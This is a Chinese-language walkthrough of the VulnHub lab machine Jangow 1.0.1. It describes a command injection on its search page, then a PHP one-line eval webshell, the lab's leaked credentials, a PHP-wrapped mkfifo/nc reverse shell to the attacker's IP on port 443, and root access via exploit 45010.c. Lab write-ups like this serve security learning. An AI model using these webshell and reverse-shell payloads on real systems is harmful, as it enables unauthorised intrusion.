JANGOW: 1.0.1
前期准备:
靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/、
kali攻击机IP:192.168.1.130
靶机地址:192.168.1.139
一、信息收集
1.使用nmap扫描靶机地址
nmap -p 1-65535 -A -sV 192.168.1.139
发现开放了21和80端口,查看一下80端口。
2.收集网站信息
检查页面后发现Buscar页面有个可疑的地方:
做一下测试:
发现可以执行系统指令。
二、漏洞攻击
直接写入一句话木马试一下:
echo '<?php eval($_POST["sain"]);' > sain.php
返回200,用蚁剑链接一下:
连接成功。简单查看一下文件,在/var/www/html/site/wordpress下也发现了配置文件:
除此之外发现在/var/www/html下有一个./backup文件:
发现都是数据库的用户名和密码,但是jangow01和系统名字一样,所以我就尝试下直接登录系统,发现可以直接登陆进去:
username = "jangow01"
password = "abygurl69"
可以直接在系统里进行提权做,但是通常是写入反弹shell连接,然后发现 nc 中的 -e 参数无法使用
除此之外也尝试了好几种反弹shell,发现存在端口限制,试了好几个端口后发现443端口能用,因为网站使用的是php语言,所以写入一个php反弹shell文件:
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.130 443 >/tmp/f');?>
kali上开启监听,并且访问 反弹shell的php文件:
发现连接成功,写入交互式shell,要使用python3:
python3 -c 'import pty;pty.spawn("/bin/bash")'
在home目录下发现一个user.txt文件:
用md5解不出来,然后查看一下系统版本,看看有没有可利用的漏洞:
三、提权
靶机环境是ubuntu16.04,使用 searchsploit 看看有没有什么可利用的漏洞
试了好几个后发现 45010.c 可以利用,把45010.c文件传送到靶机中,我这开个http服务:
赋一下权限(一开始我用的 jangow01 用户做的,发现无法赋权,后来试了下 www-data 可以):
先用 gcc 运行一下45010.c文件:
生成一个 a.out 文件,运行a.out文件,得到root权限,查看flag: